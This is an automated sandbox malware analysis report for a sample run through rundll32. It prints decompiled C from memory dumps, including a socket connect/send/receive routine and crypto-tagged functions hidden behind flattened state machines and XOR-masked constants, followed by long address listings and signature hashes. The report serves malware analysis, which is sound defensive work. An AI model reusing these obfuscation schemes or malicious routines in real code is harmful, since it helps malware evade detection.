                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • Part of subcall function 1001DD46: GetDlgItem.USER32(?,3F6A93DE), ref: 1001DD53
                                                                                                                      • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                    • String ID: Connected$Disconnected$Wait...
                                                                                                                    • API String ID: 2263617321-2304371739
                                                                                                                    • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                    • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                    • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                    • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00332251 Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00332251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E00333DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E00340DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E00340DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E00350E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E00337FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E00340DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E00350E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E0034C631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E00340DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E00340DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}























































                                                                                                                    0x0033225a
                                                                                                                    0x00332262
                                                                                                                    0x00332269
                                                                                                                    0x0033226b
                                                                                                                    0x00332272
                                                                                                                    0x00332273
                                                                                                                    0x00332274
                                                                                                                    0x00332275
                                                                                                                    0x0033227a
                                                                                                                    0x00332282
                                                                                                                    0x00332285
                                                                                                                    0x0033228c
                                                                                                                    0x00332294
                                                                                                                    0x00332299
                                                                                                                    0x003322a7
                                                                                                                    0x003322ac
                                                                                                                    0x003322b0
                                                                                                                    0x003322b5
                                                                                                                    0x003322bd
                                                                                                                    0x003322c5
                                                                                                                    0x003322cd
                                                                                                                    0x003322d5
                                                                                                                    0x003322dd
                                                                                                                    0x003322e5
                                                                                                                    0x003322ed
                                                                                                                    0x003322f5
                                                                                                                    0x003322fd
                                                                                                                    0x0033230d
                                                                                                                    0x00332313
                                                                                                                    0x0033231b
                                                                                                                    0x00332323
                                                                                                                    0x0033232b
                                                                                                                    0x00332330
                                                                                                                    0x00332338
                                                                                                                    0x00332340
                                                                                                                    0x0033234c
                                                                                                                    0x00332351
                                                                                                                    0x00332357
                                                                                                                    0x0033235f
                                                                                                                    0x0033236a
                                                                                                                    0x00332375
                                                                                                                    0x00332380
                                                                                                                    0x00332388
                                                                                                                    0x00332390
                                                                                                                    0x00332398
                                                                                                                    0x003323a0
                                                                                                                    0x003323a8
                                                                                                                    0x003323ad
                                                                                                                    0x003323b2
                                                                                                                    0x003323ba
                                                                                                                    0x003323c7
                                                                                                                    0x003323c8
                                                                                                                    0x003323d2
                                                                                                                    0x003323d6
                                                                                                                    0x003323de
                                                                                                                    0x003323e6
                                                                                                                    0x003323ee
                                                                                                                    0x003323f3
                                                                                                                    0x003323fd
                                                                                                                    0x00332411
                                                                                                                    0x00332416
                                                                                                                    0x0033241f
                                                                                                                    0x0033242a
                                                                                                                    0x00332432
                                                                                                                    0x0033243f
                                                                                                                    0x00332442
                                                                                                                    0x00332446
                                                                                                                    0x0033244e
                                                                                                                    0x00332456
                                                                                                                    0x0033245e
                                                                                                                    0x0033246e
                                                                                                                    0x00332472
                                                                                                                    0x0033247a
                                                                                                                    0x00332485
                                                                                                                    0x00332490
                                                                                                                    0x0033249b
                                                                                                                    0x003324a3
                                                                                                                    0x003324ab
                                                                                                                    0x003324b3
                                                                                                                    0x003324c5
                                                                                                                    0x003324ca
                                                                                                                    0x003324d3
                                                                                                                    0x003324de
                                                                                                                    0x003324e6
                                                                                                                    0x003324eb
                                                                                                                    0x003324f3
                                                                                                                    0x00332500
                                                                                                                    0x00332501
                                                                                                                    0x00332505
                                                                                                                    0x0033250d
                                                                                                                    0x00332515
                                                                                                                    0x0033251d
                                                                                                                    0x00332525
                                                                                                                    0x0033252d
                                                                                                                    0x00332532
                                                                                                                    0x00332537
                                                                                                                    0x0033253f
                                                                                                                    0x0033254c
                                                                                                                    0x00332550
                                                                                                                    0x00332558
                                                                                                                    0x00332560
                                                                                                                    0x00332566
                                                                                                                    0x0033256a
                                                                                                                    0x0033256f
                                                                                                                    0x00332573
                                                                                                                    0x00332578
                                                                                                                    0x00332580
                                                                                                                    0x0033258b
                                                                                                                    0x00332596
                                                                                                                    0x003325a1
                                                                                                                    0x003325a9
                                                                                                                    0x003325b1
                                                                                                                    0x003325b9
                                                                                                                    0x003325c1
                                                                                                                    0x003325c6
                                                                                                                    0x003325cb
                                                                                                                    0x003325d3
                                                                                                                    0x003325e6
                                                                                                                    0x003325ed
                                                                                                                    0x003325f8
                                                                                                                    0x00332600
                                                                                                                    0x00332608
                                                                                                                    0x0033260d
                                                                                                                    0x00332612
                                                                                                                    0x0033261c
                                                                                                                    0x00332635
                                                                                                                    0x0033263a
                                                                                                                    0x00332643
                                                                                                                    0x0033264e
                                                                                                                    0x00332656
                                                                                                                    0x0033265b
                                                                                                                    0x00332660
                                                                                                                    0x00332668
                                                                                                                    0x00332674
                                                                                                                    0x0033267c
                                                                                                                    0x00332680
                                                                                                                    0x00332685
                                                                                                                    0x0033268d
                                                                                                                    0x00332695
                                                                                                                    0x0033269d
                                                                                                                    0x003326aa
                                                                                                                    0x003326ae
                                                                                                                    0x003326b6
                                                                                                                    0x003326be
                                                                                                                    0x003326c6
                                                                                                                    0x003326d3
                                                                                                                    0x003326d7
                                                                                                                    0x003326dc
                                                                                                                    0x003326e4
                                                                                                                    0x003326ef
                                                                                                                    0x003326fa
                                                                                                                    0x003326fa
                                                                                                                    0x00332705
                                                                                                                    0x00332705
                                                                                                                    0x00332705
                                                                                                                    0x00332705
                                                                                                                    0x00332707
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033270d
                                                                                                                    0x0033282a
                                                                                                                    0x0033282f
                                                                                                                    0x00332832
                                                                                                                    0x00000000
                                                                                                                    0x00332713
                                                                                                                    0x00332719
                                                                                                                    0x00332808
                                                                                                                    0x0033280a
                                                                                                                    0x0033280d
                                                                                                                    0x00000000
                                                                                                                    0x0033271f
                                                                                                                    0x00332725
                                                                                                                    0x003327f2
                                                                                                                    0x003327f7
                                                                                                                    0x003327fa
                                                                                                                    0x00000000
                                                                                                                    0x0033272b
                                                                                                                    0x00332731
                                                                                                                    0x003327c0
                                                                                                                    0x003327c5
                                                                                                                    0x003327c8
                                                                                                                    0x00000000
                                                                                                                    0x00332733
                                                                                                                    0x00332739
                                                                                                                    0x0033278b
                                                                                                                    0x00332790
                                                                                                                    0x00332793
                                                                                                                    0x00000000
                                                                                                                    0x0033273b
                                                                                                                    0x00332741
                                                                                                                    0x00000000
                                                                                                                    0x00332747
                                                                                                                    0x00332756
                                                                                                                    0x00332757
                                                                                                                    0x00332758
                                                                                                                    0x0033275d
                                                                                                                    0x00332763
                                                                                                                    0x00332769
                                                                                                                    0x00000000
                                                                                                                    0x00332769
                                                                                                                    0x00332763
                                                                                                                    0x00332741
                                                                                                                    0x00332739
                                                                                                                    0x00332731
                                                                                                                    0x00332725
                                                                                                                    0x00332719
                                                                                                                    0x0033293e
                                                                                                                    0x00332940
                                                                                                                    0x00332945
                                                                                                                    0x00332945
                                                                                                                    0x0033294f
                                                                                                                    0x0033294f
                                                                                                                    0x0033283c
                                                                                                                    0x00332842
                                                                                                                    0x003328fd
                                                                                                                    0x00332902
                                                                                                                    0x00332905
                                                                                                                    0x00000000
                                                                                                                    0x00332848
                                                                                                                    0x00332848
                                                                                                                    0x0033284e
                                                                                                                    0x00332936
                                                                                                                    0x00332854
                                                                                                                    0x00332854
                                                                                                                    0x00332856
                                                                                                                    0x003328d3
                                                                                                                    0x003328d6
                                                                                                                    0x00000000
                                                                                                                    0x00332858
                                                                                                                    0x00332858
                                                                                                                    0x0033285e
                                                                                                                    0x003328ba
                                                                                                                    0x003328bf
                                                                                                                    0x003328c2
                                                                                                                    0x00000000
                                                                                                                    0x00332860
                                                                                                                    0x00332860
                                                                                                                    0x00332866
                                                                                                                    0x00000000
                                                                                                                    0x0033286c
                                                                                                                    0x00332889
                                                                                                                    0x0033288e
                                                                                                                    0x00332891
                                                                                                                    0x00000000
                                                                                                                    0x00332891
                                                                                                                    0x00332866
                                                                                                                    0x0033285e
                                                                                                                    0x00332856
                                                                                                                    0x0033284e
                                                                                                                    0x00000000
                                                                                                                    0x0033290a
                                                                                                                    0x0033290a
                                                                                                                    0x0033290a
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                    • API String ID: 0-245365489
                                                                                                                    • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                    • Instruction ID: b835a220d360ca1ada15c269ce706b9bf4702a394f4bcb14f8181e1e438c767f
                                                                                                                    • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                    • Instruction Fuzzy Hash: 4AF130B15083809FD369CF61C48AA5BFBE1FBD4348F10891DF29A8A261D7B59958CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00339714 Relevance: 14.0, Strings: 11, Instructions: 232COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00339714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E0033CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E0034C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E00337B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E00337C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E00349E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E003346BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0033219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}











































                                                                                                                    0x00339714
                                                                                                                    0x00339717
                                                                                                                    0x0033971c
                                                                                                                    0x00339724
                                                                                                                    0x0033972c
                                                                                                                    0x00339734
                                                                                                                    0x0033973c
                                                                                                                    0x00339745
                                                                                                                    0x00339749
                                                                                                                    0x0033974b
                                                                                                                    0x00339752
                                                                                                                    0x0033975a
                                                                                                                    0x0033975c
                                                                                                                    0x00339764
                                                                                                                    0x00339769
                                                                                                                    0x00339771
                                                                                                                    0x00339779
                                                                                                                    0x00339781
                                                                                                                    0x00339789
                                                                                                                    0x00339791
                                                                                                                    0x00339799
                                                                                                                    0x003397a1
                                                                                                                    0x003397a6
                                                                                                                    0x003397ae
                                                                                                                    0x003397b6
                                                                                                                    0x003397be
                                                                                                                    0x003397c6
                                                                                                                    0x003397ce
                                                                                                                    0x003397d6
                                                                                                                    0x003397e4
                                                                                                                    0x003397e9
                                                                                                                    0x003397f4
                                                                                                                    0x003397f7
                                                                                                                    0x003397fb
                                                                                                                    0x00339803
                                                                                                                    0x00339813
                                                                                                                    0x0033981c
                                                                                                                    0x0033981f
                                                                                                                    0x0033982b
                                                                                                                    0x0033982f
                                                                                                                    0x00339837
                                                                                                                    0x0033983f
                                                                                                                    0x00339844
                                                                                                                    0x00339850
                                                                                                                    0x00339853
                                                                                                                    0x00339857
                                                                                                                    0x0033985f
                                                                                                                    0x00339867
                                                                                                                    0x0033986f
                                                                                                                    0x00339877
                                                                                                                    0x0033987f
                                                                                                                    0x00339887
                                                                                                                    0x0033988f
                                                                                                                    0x00339897
                                                                                                                    0x0033989f
                                                                                                                    0x003398a7
                                                                                                                    0x003398ac
                                                                                                                    0x003398b1
                                                                                                                    0x003398b9
                                                                                                                    0x003398c1
                                                                                                                    0x003398c9
                                                                                                                    0x003398d3
                                                                                                                    0x003398e0
                                                                                                                    0x003398e8
                                                                                                                    0x003398f0
                                                                                                                    0x003398f8
                                                                                                                    0x00339907
                                                                                                                    0x0033990a
                                                                                                                    0x0033990e
                                                                                                                    0x00339916
                                                                                                                    0x00339923
                                                                                                                    0x00339927
                                                                                                                    0x0033992f
                                                                                                                    0x00339937
                                                                                                                    0x0033993f
                                                                                                                    0x00339947
                                                                                                                    0x0033994f
                                                                                                                    0x00339957
                                                                                                                    0x0033995f
                                                                                                                    0x00339967
                                                                                                                    0x0033996f
                                                                                                                    0x0033997f
                                                                                                                    0x00339983
                                                                                                                    0x0033998b
                                                                                                                    0x00339993
                                                                                                                    0x0033999b
                                                                                                                    0x003399a7
                                                                                                                    0x003399ac
                                                                                                                    0x003399b2
                                                                                                                    0x003399ba
                                                                                                                    0x003399c2
                                                                                                                    0x003399ce
                                                                                                                    0x003399d1
